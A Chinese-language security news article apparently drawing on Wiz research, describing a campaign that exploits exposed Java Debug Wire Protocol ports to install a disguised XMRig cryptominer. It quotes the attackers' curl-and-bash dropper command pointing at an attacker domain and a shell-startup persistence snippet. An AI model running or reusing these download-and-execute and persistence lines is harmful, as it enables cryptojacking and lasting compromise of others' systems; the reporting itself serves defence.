網(wǎng)絡(luò)安全研究人員發(fā)現(xiàn)新一輪網(wǎng)絡(luò)攻擊正針對那些無意中將Java調(diào)試線協(xié)議（JDWP）服務(wù)器暴露在互聯(lián)網(wǎng)上的組織機(jī)構(gòu)。攻擊者利用這一被忽視的入口點(diǎn)，部署復(fù)雜的加密貨幣挖礦惡意軟件。

漏洞利用機(jī)制

JDWP作為Java平臺的標(biāo)準(zhǔn)功能，本意是讓開發(fā)人員能夠檢查實(shí)時(shí)應(yīng)用程序，從而促進(jìn)遠(yuǎn)程調(diào)試。但當(dāng)JDWP在生產(chǎn)系統(tǒng)中保持可訪問狀態(tài)時(shí)——通常由于配置錯(cuò)誤或在生產(chǎn)環(huán)境中使用開發(fā)標(biāo)志——它就會成為遠(yuǎn)程代碼執(zhí)行的強(qiáng)大載體。

這種威脅的出現(xiàn)伴隨著快速的利用周期。在多個(gè)觀察到的案例中，攻擊者能夠在系統(tǒng)暴露后數(shù)小時(shí)內(nèi)入侵易受攻擊的機(jī)器。攻擊流程通常始于對開放JDWP端口（最常見的是5005端口）的大規(guī)模互聯(lián)網(wǎng)掃描。一旦識別到目標(biāo)，攻擊者會發(fā)起JDWP握手以確認(rèn)服務(wù)處于活動(dòng)狀態(tài)，然后建立會話，獲得對Java虛擬機(jī)（JVM）的交互式訪問權(quán)限。這種訪問權(quán)限使攻擊者能夠枚舉加載的類并調(diào)用方法，最終實(shí)現(xiàn)在主機(jī)上執(zhí)行任意命令。

攻擊技術(shù)分析

Wiz安全分析師在觀察到針對其TeamCity（一種流行的CI/CD工具）蜜罐服務(wù)器的利用嘗試后，確認(rèn)了此次攻擊活動(dòng)。攻擊者表現(xiàn)出高度的自動(dòng)化和定制化能力，部署了經(jīng)過修改的XMRig挖礦程序，其中包含硬編碼配置以規(guī)避檢測。

值得注意的是，該惡意軟件使用礦池代理來隱藏目標(biāo)錢包地址，增加了追蹤或破壞非法挖礦操作的難度。這些攻擊的影響十分嚴(yán)重。通過濫用JDWP，威脅行為者不僅可以部署挖礦程序，還能建立深度持久性、操縱系統(tǒng)進(jìn)程，并可能轉(zhuǎn)向入侵環(huán)境中的其他資產(chǎn)。惡意軟件隱蔽的特性，加上其能夠偽裝成合法系統(tǒng)工具的能力，增加了長期未被發(fā)現(xiàn)活動(dòng)和資源耗盡的風(fēng)險(xiǎn)。

感染鏈剖析

聚焦感染機(jī)制，攻擊者利用JDWP缺乏身份驗(yàn)證的特點(diǎn)，直接通過協(xié)議注入和執(zhí)行shell命令。建立會話后，他們通常會使用如下命令下載投放器腳本（如logservice.sh）：

curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh

該腳本經(jīng)過精心設(shè)計(jì)，能夠終止競爭挖礦程序，下載偽裝成logrotate的惡意XMRig二進(jìn)制文件，并將其安裝到用戶的配置目錄中。隨后，腳本會設(shè)置多種持久化機(jī)制，包括修改shell啟動(dòng)文件、創(chuàng)建定時(shí)任務(wù)以及安裝偽造的系統(tǒng)服務(wù)。

以下代碼片段展示了腳本如何通過shell配置確保持久性：

add_to_startup() {
 if [ -r "q" ]; then
  if ! grep -Fxq "$EXEC >/dev/null 2>&1" "q"; then
   echo "$EXEC >/dev/null 2>&1" >> "q"
  fi
 fi
}

這種感染鏈既高效又具有彈性，使得挖礦程序能夠在系統(tǒng)重啟和用戶登錄后繼續(xù)存活。攻擊者使用看似合法的進(jìn)程名稱和系統(tǒng)位置，進(jìn)一步增加了檢測和修復(fù)的難度，這凸顯了加強(qiáng)配置管理和嚴(yán)格監(jiān)控暴露服務(wù)的必要性。